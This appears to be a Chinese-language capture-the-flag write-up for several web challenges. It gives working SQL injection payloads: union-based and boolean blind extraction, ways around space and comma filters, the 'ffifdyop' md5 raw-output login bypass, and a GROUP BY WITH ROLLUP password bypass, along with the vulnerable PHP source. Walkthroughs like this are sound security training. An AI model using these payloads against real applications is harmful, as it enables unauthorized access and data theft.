web6(union聯合注入)
1、用bp fuzz,過濾了空格,用/**/繞過
2、union聯合查詢
判斷列數:
'union/**/select/**/1,2,3#
奇怪,order by不行啊
爆庫:
'union/**/select/**/1,group_concat(schema_name),3/**/from/**/information_schema.schemata#
(庫名測一下,在第2字段)
爆表:
'union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema="web2"#
爆字段:
'union/**/select/**/1,group_concat(column_name),1/**/from/**/information_schema.columns/**/where/**/table_name="flag"#
爆數據:
'union/**/select/**/1,group_concat(flag),3/**/from/**/web2.flag#
web7(bool盲注)
1、點開3個列表,url出現id參數且有對應的值
2、加單引號,它就沒報錯 ,奇怪啊
?1'%23,加注釋把后面的單引號注釋掉,相當於select * from table where id='1'%23',和原頁面一樣
?id=1'/**/and/**/1=1%23 和原頁面一樣
?id=1'/**/and/**/1=2%23 無查詢結果
說明是字符型注入
3、用bp fuzz,過濾了空格,用/**/繞過
4、用union select和報錯注都沒回顯,嘗試盲注
爆庫:
?id=-1'/**/or/**/ascii(substr(database(),1,1))=1%23
庫名:web7
爆表:
?id=-1'/**/or/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1),1,1))=1%23
("web7")
表名:flag
爆字段:
?id=-1'/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),1,1))=1%23
爆數據:
?id=-1'/**/or/**/ascii(substr((select/**/flag/**/from/**/web7.flag/**/limit/**/0,1),1,1))=1%23
s="102 108 97 103 123 48 50 56 50 50 54 98 48 45 57 101 48 52 45 52 54 48 55 45 57 48 52 100 45 100 100 56 101 99 98 56 102 100 56 55 55 125"
flag=''
for i in [int(i) for i in s.split()]:
flag += chr(i)
print(flag)
python腳本:
web8(bool盲注)
1、加單引號,單引號被過濾了?
2、打開bp fuzz,過濾了空格、單引號、逗號、union、and
?id=1/**/&&/**/1=1%23 與原始頁面一樣
(anandd不行,有雙引號檢測呢吧)
?id=1/**/&&/**/1=2%23 與原始頁面一與
說明是字符型注入
3、過濾了union關鍵字,聯合注入不行
嘗試bool盲注
總結
盲注中繞過逗號:用substr(str from start for len)代替substr(str,start,len)
web9(md5繞過)
0、打開題目就是這樣
1、
select * from table where username='admin' and password='' or '1'
用萬能密碼,沒有回顯
2、用dirsearch掃后台,存在robots.txt,訪問index.phps
3、index.phps:
<?php
$flag="";
$password=$_POST['password'];
if(strlen($password)>10){
die("password error");
}
$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
while($row=mysqli_fetch_assoc($result)){
echo "登陸成功<br>";
echo $flag;
}
}
意思就是:
- 只輸入密碼
- 密碼長度不超過10位
- 對
$password進行md5加密,如果sql語句為:select * from user where username ='admin' and password =''or'2xxx',假 or 真,為真。那么只需要找一個字符串,md5加密后有'or'數字(數字不能是0)即可。
害,直接用網上的吧:
ffifdyop
129581926211651571912466741651878684928
所以密碼直接輸ffifdyop。
總結
sql注入中的md5(str, TRUE)繞過
-
select * from user where username ='admin' and password =''or'6�]��'
假 or 真,為真
(因為在mysql里,字符串或變量作布爾型判斷時,以數字開頭的字符串會忽略數字后面的字符。例:password=‘xxx’ or ‘1xxx’,那么就相當於password=‘xxx’ or 1,結果為true。) -
select * from user where username ='admin' and password ='��'or'8'
假 or 真,為真
payload:
ffifdyop
129581926211651571912466741651878684928
web10
1、源碼:
<?php
$flag="";
//過濾幾個關鍵字
function replaceSpecialChar($strParam){
$regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
return preg_replace($regex,"",$strParam);
}
if (!$con)
{
die('Could not connect: ' . mysqli_error());
}
//不能雙寫繞過
if(strlen($username)!=strlen(replaceSpecialChar($username))){
die("sql inject error");
}
if(strlen($password)!=strlen(replaceSpecialChar($password))){
die("sql inject error");
}
$sql="select * from user where username = '$username'";
//查詢數據庫
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){//查詢結果行數>0
while($row=mysqli_fetch_assoc($result)){//關聯數組
if($password==$row['password']){
echo "登陸成功<br>";
echo $flag;
}
}
}
?>
mysql中,有一個with rollup關鍵字,是在group by分組的基礎上再進行分組。一般用group by進行分組后,列的屬性值不同,加上with rollup會多出一行列為null的新數據
利用with rollup使sql查詢結果結果為null,之后,輸入密碼為空,即可使\(password==\)row['password']
payload:'or/**/1=1/**/group/**/by/**/password/**/with/**/rollup/**/#
sql:select * from user where username=' 'or/**/1=1/**/GROUP/**/BY/**/password/**/WITH/**/ROLLUP# '
筆記
https://www.runoob.com/mysql/mysql-group-by-statement.html
mysql的with rollup語句
